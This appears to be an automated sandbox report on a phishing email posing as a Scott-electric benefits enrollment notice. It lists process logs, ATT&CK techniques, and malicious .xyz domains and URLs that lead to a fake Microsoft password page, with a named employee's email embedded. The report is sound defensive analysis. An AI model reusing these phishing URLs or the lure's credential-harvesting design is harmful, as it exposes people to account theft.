            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4616 --field-trial-handle=1968,i,10276406539543630318,17323566579801720130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Drive-by Compromise            		Windows Management Instrumentation1
            DLL Side-Loading            		1
            Process Injection            		3
            Masquerading            		OS Credential Dumping1
            Process Discovery            		Remote ServicesData from Local System2
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory1
            File and Directory Discovery            		Remote Desktop ProtocolData from Removable Media1
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		Security Account Manager13
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Extra Window Memory Injection            		1
            Extra Window Memory Injection            		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RKD4N0TN/LLZ-950309.htm0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            		51.38.145.13
            		truetrue
              		unknown
              288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
              		51.38.145.13
              		truetrue
                		unknown
                a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
                		51.38.145.13
                		truetrue
                  		unknown
                  www.google.com
                  		142.250.184.228
                  		truefalse
                    		unknown
                    78d704d5-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
                    		51.38.145.13
                    		truetrue
                      		unknown
                      online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
                      		51.38.145.13
                      		truetrue
                        		unknown
                        2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
                        		51.38.145.13
                        		truetrue
                          		unknown
                          a14bf615-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
                          		51.38.145.13
                          		truetrue
                            		unknown
                            371098e6-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
                            		51.38.145.13
                            		truetrue
                              		unknown
                              l1ve.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
                              		51.38.145.13
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.comtrue
                                  		unknown
                                  https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=truetrue
                                    		unknown
                                    file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RKD4N0TN/LLZ-950309.htmfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspxfalse
                                      		unknown
                                      https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/logintrue
                                        		unknown
                                        https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          51.38.145.13
                                          		f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyzFrance
                                          		16276OVHFRtrue
                                          52.113.194.132
                                          		unknownUnited States
                                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          142.250.185.67
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          1.1.1.1
                                          		unknownAustralia
                                          		13335CLOUDFLARENETUSfalse
                                          52.111.236.32
                                          		unknownUnited States
                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          173.194.76.84
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          142.250.185.110
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          142.250.185.238
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          239.255.255.250
                                          		unknownReserved
                                          		unknownunknownfalse
                                          142.250.185.163
                                          		unknownUnited States
                                          		15169GOOGLEUSfalse
                                          2.19.126.160
                                          		unknownEuropean Union
                                          		16625AKAMAI-ASUSfalse
                                          184.28.90.27
                                          		unknownUnited States
                                          		16625AKAMAI-ASUSfalse
                                          142.250.184.228
                                          		www.google.comUnited States
                                          		15169GOOGLEUSfalse
                                          13.69.116.108
                                          		unknownUnited States
                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          52.109.76.243
                                          		unknownUnited States
                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          52.109.76.144
                                          		unknownUnited States
                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                          Private

                                          IP
                                          192.168.2.17
                                          192.168.2.7
                                          192.168.2.18

                                          General Information

                                          Joe Sandbox version:40.0.0 Tourmaline
                                          Analysis ID:1466358
                                          Start date and time:2024-07-02 20:21:14 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:24
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Sample name:44zg1cvu.msg
                                          renamed because original name is a hash value
                                          Original Sample Name:FW BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for Scott-electric Friday 28th of June 2024 m144zg1cvu.msg
                                          Detection:MAL
                                          Classification:mal68.phis.troj.winMSG@20/67@28/148
                                          Cookbook Comments:
                                          • Found application associated with file extension: .msg

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                          • Excluded IPs from analysis (whitelisted): 52.113.194.132, 184.28.90.27, 52.109.76.243, 2.19.126.160, 2.19.126.151, 93.184.221.240, 52.111.236.32, 52.111.236.33, 52.111.236.35, 52.111.236.34, 192.229.221.95, 52.109.76.144, 13.69.116.108, 142.250.185.163, 142.250.185.110, 173.194.76.84, 34.104.35.123
                                          • Excluded domains from analysis (whitelisted): omex.cdn.office.net, neu-azsc-000.odc.officeapps.live.com, odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, onedscolprdweu15.westeurope.cloudapp.azure.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, a1864.dscd.akamai.net, osiprod-neu-bronze-azsc-000.northeurope.cloudapp.azure.com, ecs.office.com, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, nleditor.osi.office.net, prod-eu-resolve
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetValueKey calls found.
                                          • VT rate limit hit for: 44zg1cvu.msg

                                          LLM Input / Output

                                          InputOutput
                                          URL: e-Mail Model: gpt-4o
                                          ```json{  "riskscore": 7,  "brand_impersonated": "Scott-electric",  "reasons": "1. The email claims to be from Scott-electric, a known brand, which could be an impersonation attempt.\n2. The email header shows two different email addresses: noreply@netchexonline.com and melodi@scott-electric.com, which is suspicious and indicative of potential spoofing.\n3. The subject line and body create a sense of urgency by emphasizing the enrollment deadline and the need to take immediate action.\n4. The email contains an attachment, which is a common tactic used in phishing emails to deliver malicious content.\n5. The warning at the top of the email indicates that it was sent from outside the organization, which is a red flag for phishing attempts.\n6. The email uses social engineering tactics by emphasizing the importance of the enrollment process and the potential consequences of not acting."}
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true Model: Perplexity: mixtral-8x7b-instruct
                                          {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as it does not request any sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency, as it does not prompt the user to take immediate action or imply any negative consequences for not doing so.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism."]}
                                          Title: LLZ-950309.htm OCR: It looks like this email is used with more than one account from Microsoft. Which one do you want to use? Work or school account Created by yur department melodi@scott-electric.com Personal account Created by yu meldi@scott-electric.com Tired of seeing this? Rename your #rsonal Microsoft account. Sign in with another account Terms of use Privacy & ckies
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true Model: Perplexity: mixtral-8x7b-instruct
                                          {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","The text does not create a sense of urgency or interest.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                          Title: LLZ-950309.htm OCR: a Microsoft melodi@scott-electric.com Enter password Password Forgot my password Sign in Terms of use Privacy & ckies
                                          URL: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz Model: gpt-4o
